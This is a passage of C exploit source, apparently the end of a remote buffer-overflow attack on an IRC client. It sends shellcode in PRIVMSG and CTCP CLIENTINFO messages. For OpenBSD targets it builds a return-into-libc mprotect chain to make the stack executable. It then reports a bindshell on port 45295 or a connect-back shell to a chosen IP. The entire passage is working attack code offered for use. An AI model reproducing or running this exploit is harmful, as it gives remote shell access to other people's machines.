 memcpy(sh_buffer + sizeof(sh_buffer) - 1 - strlen(targets[type -
1].shellcode),
 targets[type - 1].shellcode, strlen(targets[type - 1].shellcode));
 sh_buffer[sizeof(sh_buffer) - 1] = 0x0;

 if (send_text(sock_server_new, ":[email protected] PRIVMSG a:
%s\r\n", sh_buffer) < 0) {
 if (verbose == 1) fprintf(stderr, "[%s] send failed!\n",
inet_ntoa(saddr_in2.sin_addr));
 exit(1);
 }

 usleep(300000);

 if (targets[type - 1].type == 2 || targets[type - 1].type == 5) {

 /* OpenBSD 3.2!

 Quote:

 "As theo announced on misc@, non-executable stack support is available
in the most
 recent snapshots for most platforms. In other words, say goodbye to the
vast majority
 of buffer overflow attacks against OpenBSD machines :-) "

 The stack is non executable at default, so we use a return into libc
technic,
 to get the stack executable again. We use the mprotect() function in
libc,
 to mark the stack PROT_WRITE|PROT_READ|PROT_EXEC ;)

 */
 size = -1;
 memset(ret_buffer, 0x90, sizeof(ret_buffer));
 memcpy(ret_buffer + 28, &targets[type - 1].mprotect, 4);
 memcpy(ret_buffer + 32, &targets[type - 1].ret, 4);
 memcpy(ret_buffer + 36, &targets[type - 1].ret, 4); // void *addr
 memcpy(ret_buffer + 40, &size, 4);
 // size_t len
 ret_buffer[44] = 0x07;
 // int prot
 ret_buffer[200] = 0x00;

 } else {

 memset(ret_buffer, 0x0, sizeof(ret_buffer));

 for(i = 0; i < sizeof(ret_buffer) - 4; i += 4)
 {
 ret_buffer[i + 0] = (targets[type - 1].ret >> 0) & 0xff;
 ret_buffer[i + 1] = (targets[type - 1].ret >> 8) & 0xff;
 ret_buffer[i + 2] = (targets[type - 1].ret >> 16) & 0xff;
 ret_buffer[i + 3] = (targets[type - 1].ret >> 24) & 0xff;
 }
 }

 memset(buffer, 0x90, sizeof(buffer));
 memcpy(buffer - sizeof(jmp_code) - 2, jmp_code, sizeof(jmp_code) - 1);
 buffer[sizeof(buffer) - 1] = 0x00;

 if (send_text(sock_server_new,
 ":%[email protected] PRIVMSG a: %cCLIENTINFO %s%c\r\n",
 buffer, 0x01, ret_buffer, 0x01) < 0) {
 if (verbose == 1) {
 fprintf(stderr, "[%s] send failed!\n", inet_ntoa(saddr_in2.sin_addr));
 exit(1);
 }
 }

 if (connectback == 0) {
 if (log) fprintf(log, "[%s] %s - Bindshell is running on port
0xb0ef(45295).\n",
 inet_ntoa(saddr_in2.sin_addr), nick);
 fprintf(stderr, "[%s] Bindshell is running on port 0xb0ef(45295).\n",
 inet_ntoa(saddr_in2.sin_addr));
 } else {
 if (log) fprintf(log, "[%s] %s - Connecting to %d.%d.%d.%d:45295.\n",
 inet_ntoa(saddr_in2.sin_addr), nick, ip1, ip2, ip3, ip4);
 fprintf(stderr, "[%s] Connecting to %d.%d.%d.%d:45295.\n",
 inet_ntoa(saddr_in2.sin_addr), ip1, ip2, ip3, ip4);
 }

 close(sock_server_new);
 exit(0);
 }

 close(sock_server_new);
 }

 return 0;
}

/* EOF */